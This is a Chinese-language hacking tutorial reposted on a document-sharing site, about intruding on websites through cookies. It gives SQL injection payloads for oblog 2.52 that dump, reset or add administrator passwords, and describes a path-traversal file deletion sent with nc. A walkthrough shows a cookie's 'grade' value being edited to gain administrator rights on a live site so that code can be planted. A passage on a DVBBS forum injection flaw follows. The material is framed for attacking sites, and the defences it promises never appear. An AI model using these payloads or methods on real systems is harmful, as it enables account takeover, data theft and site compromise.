查找关于COOKIES入侵的方法及工具

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

查找关于COOKIES入侵的方法及工具

Cookies 是一小段提请存储在您的计算机硬盘上的文本。当获得您的同意后,浏览器将会把此段文本存储到一个小文件中。

如果您将浏览器设定为在接收Cookies 之前给予提示,您在访问 网站时将会注意到希望在您的计算机上放置Cookies 的请求,其目的是通知我们您何时访问了我们的网站。这个Cookies 本身只是告诉我们一为过去的访问者再次访问了 网站,而不会提供有关您的电子邮件地址或您是谁等信息。当然,您可以选择通过注册在以后某个时候告诉我们这些信息。

cookies就是网页放在你的电脑中的一些文件,由网页脚本语言控制生成删除修改访问查阅判断,有一定的时效性(程序中规定)。一般打开是乱码。

怎么察看cookies ?

第一种办法:在ie里有一个“导入导出功能”,可以将你的cookies导出到一个自己定义的文件,可以是txt

第二种方法:下载一个叫做cookies 察看器的小工具,即可以修改删除察看cookies 文件。第三中办法:用request.cookies(item)来访问cookies中的值。

利用cookies进行注入:

在程序中一些程序需要读取客户浏览器中的cookies来进行程序的判断,有的时候程序没有对读取的cookies进行过滤或者是判断,导致直接把cookies中的一个键的值直接提交到数据库执行。cookies是在我们客户端的,所以随便你怎么改都可以。在网页程序执行的时候直接把cookies中的值没有经过过滤和检查是一种非常危险的事情。

伪造cookies:

在程序的执行中,有的系统是用cookies来读取用户名和密码来进行访问端的身份判断(http 是一种无状态协议),在我们通过注入或者是下载数据库读取用户名和密码成功后,可以直接修改cookies,把相应的用户名和密码和权限值代替默认的cookies中的用户名和密码和权限,意思是当你以一个普通用户登陆的时候,系统给你的电脑生成了一个cookies,其中包括了你的用户名密码权限(普通),当你得知了管理员或者其他用户用户名和密码和权限特征时候可以直接修改cookies,把你的相应的值替换成关键用户的值,这样系统就认为你是真正的那个管理员。

软件简介:oblog2.52的cookies欺骗入侵

由于oblog2.52中的inc/function.asp文件中的checkuserlogined()函数对password没有过滤就放到了sql语句执行导致了sql注入,最明显的是a’ or ’a’=’a漏洞,在function.asp还有两个函数codeCookie()是加密用户名和密码的,decodeCookie()是解密,如果是mssql,可以导致后台更改管理员密码和添加管理员等等。

0dca22a731e30058’ and 1<(select userpassword from [user] where use rid=1)--暴管理员密码

0dca22a731e30058’ update [user] set userpassword=’0dca22a731e30058’ where username=’admin’ 修改管理员密码

0dca22a731e30058’ inset into admin(username, password) values(’9xiao’,’0dca22a731e30058’)-- 加管理员,上面三个语句需要运行code cookie加密后在review修改cookies

好久没有做动画嘿嘿,今天有些时间做个最新的oblog2.52的cookies欺骗,把a’ or ’

a’=’a加密,在password中修改,嘿嘿进前台了,这个版本还有一个删除任意文件的漏洞,动画在网上已经出了,偶简单说下,抓包,在文件名那地方利用../来指定你要删除的文件比如../index.asp修改好后用nc提交就可以了,本来演示提权的没有找到mssql版的,就算了。

软件名称:cookies再次利用入侵

cookies再次利用入侵~~这次我们用明小仔的旁注工具修改COOKIES

思路:先找管理员名:landi应该是他了~~>>>像上次一样,再修改用户名>>>再修改等级在网上闲逛,无意中试下,竟然入去了~~

/index.aspx就是他

看下去

我们先注册,用户名:kker 密码:789800 登陆……

现在的等级为:小说输入员

这是KKER用户的COOKIES:_SessionId=tnkstw551m01xk55qm351prj; stat123=yes; UserInfo=username=kker&grade=1

会员 ID :landi

会员等级:小说输入员都还是这个小等级

我们再看看grade=1 等级=1~是的小说输入员

我们来改一下~~

会员 ID :landi

会员等级:小说审核员现在等级高了~~~

再改

会员 ID :landi

会员等级:管理员呵呵,管理员啊~~~

_SessionId=tnkstw551m01xk55qm351prj; stat123=yes; UserInfo=username=landi&grade=3

呵呵,现在可以挂代码………

我们进入管理中心,看行不行~都还要密码,我们再欺骗`~~~

挂代码………

完~~~

论坛入侵

目前网上有种新的趋势,黑客们的攻击目标开始从网站延伸到论坛和聊天室及留言板等公共场所,而许多用户的论坛密码竟然与E-mail和QQ的密码完全相同,因此对大家的网络安全威胁非常大。换个角度来说,黑客们通过入侵这些地方,可以得到更高的权限。比如通过80端口进行渗透入侵,甚至于还可以得到论坛和聊天室、留言板等服务主机的最高权限,是不是很可怕?许多人以为只有黑客高手才能做到这一点,其实不然,只要简单的几步,连菜鸟都能得到论坛或聊天室及留言板的一切!本文将以常见的论坛为例,谈谈主要的论坛攻击方法和防范手段。

以动网先锋论坛为例。最近该论坛出现一个漏洞,使得普通用户可以轻松地获得论坛中任意用户的密码,包括管理员在内!由于其tongji.asp文件没有过滤用户提交SQL查询的输入,导致远程攻击者可以利用这个漏洞进行SQL攻击,进而威胁论坛或服务器安全。注意,该手段对DVBBS VER 6.0.0及6.0.0 SP1、SP2都有效,对低版本的动网论坛也有效,而且无论数据库是ACCESS还是MS SQL都通吃。

相关文档
最新文档